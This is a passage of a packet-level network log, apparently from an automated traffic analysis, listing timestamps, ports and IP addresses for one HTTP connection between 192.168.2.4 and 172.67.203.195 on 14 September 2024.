Sep 14, 2024 18:31:10.300481081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300492048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300502062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300512075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300510883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.300528049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300538063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300544024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300553083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300564051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300569057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.300574064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.300657034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.301172018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.301182985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.301192999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.301219940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.301229954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.301243067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.301254034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.301261902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.301417112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.301479101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.301986933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.302036047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.302046061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.302102089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.302112103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.302122116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.302131891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.302155018 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.302356005 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.338732958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.338850975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.338860989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.338995934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.339005947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.339015961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.339020967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.339113951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.339410067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.382816076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.382843018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.382853985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.382894993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.382905006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.382915974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.382926941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.382956028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.382962942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.383023977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.383033991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.383044004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.383054018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.383160114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.383168936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.383178949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.383189917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.383209944 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.383286953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.384253979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384279966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384289026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384362936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384372950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384382963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384394884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384404898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384496927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.384555101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.384833097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384854078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384862900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384901047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384912014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384967089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384978056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.384991884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.385062933 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.385123968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.385885954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.385898113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.385907888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.385921001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.385936975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.385993958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.386033058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386044025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386054039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386063099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386073112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386089087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386161089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386164904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.386172056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386183977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386231899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.386284113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.386365891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386374950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386382103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386388063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386396885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386406898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386416912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386435032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386445999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386456013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386465073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386475086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386482954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.386485100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386495113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386506081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386518002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386528015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386562109 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.386590958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386601925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386611938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386615992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.386624098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386635065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386688948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.386740923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.386784077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386795998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386806011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386816025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386826038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386836052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386847019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386857986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386868000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386878014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.386889935 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.386980057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.387063026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387074947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387084961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387094975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387104034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387114048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387124062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387135029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387145042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387156010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387162924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.387196064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387206078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387216091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387224913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.387227058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387244940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387255907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387267113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387279987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387300014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.387361050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.387456894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387468100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387476921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387489080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387500048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387511015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387528896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387537956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.387550116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.387614965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.387988091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388019085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388053894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388092041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388103008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388113022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388145924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388154984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388210058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.388278008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.388900042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388911009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388928890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388936996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388948917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388957977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388968945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.388978004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.389117002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.389175892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.424796104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.424810886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.424823046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.424952984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.425070047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.425081968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.425091982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.425103903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.425162077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.468794107 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.470066071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470084906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470093012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470098019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470104933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470109940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470242977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470256090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470379114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.470413923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470426083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470459938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.470494032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.470779896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470954895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470968008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470978022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.470989943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.471035004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.471142054 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.471693039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.471704960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.471716881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.471726894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.471739054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.471749067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.471760988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.471767902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.471771955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.471901894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.472220898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472232103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472323895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472335100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472347021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472357988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472369909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472381115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472385883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.472444057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.472821951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472862959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472873926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.472889900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.472934008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.473221064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473581076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473592043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473603964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473613977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473625898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473637104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473649025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473658085 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.473661900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473675013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473721027 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.473741055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.473752022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473771095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473787069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473798990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473809958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473822117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473830938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.473834038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473848104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473860025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473870993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.473871946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473882914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473895073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473906040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.473918915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.473954916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474481106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474493027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474504948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474515915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474526882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474550009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474560976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474570990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474582911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474594116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474605083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474616051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474626064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474643946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474654913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474666119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474675894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474683046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474695921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474706888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474708080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474721909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474736929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474740982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474756956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474766970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474776030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474781990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474793911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474800110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474807978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474814892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474826097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474834919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474837065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474850893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474857092 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474898100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474900007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474914074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.474920034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.474967003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.475081921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475095034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475106001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475253105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.475267887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475280046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475347996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.475449085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475461006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475471973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475481987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475493908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475517988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.475615978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.475620985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.475997925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.476010084 CEST	80	49738	172.67.203.195	192.168.2.4
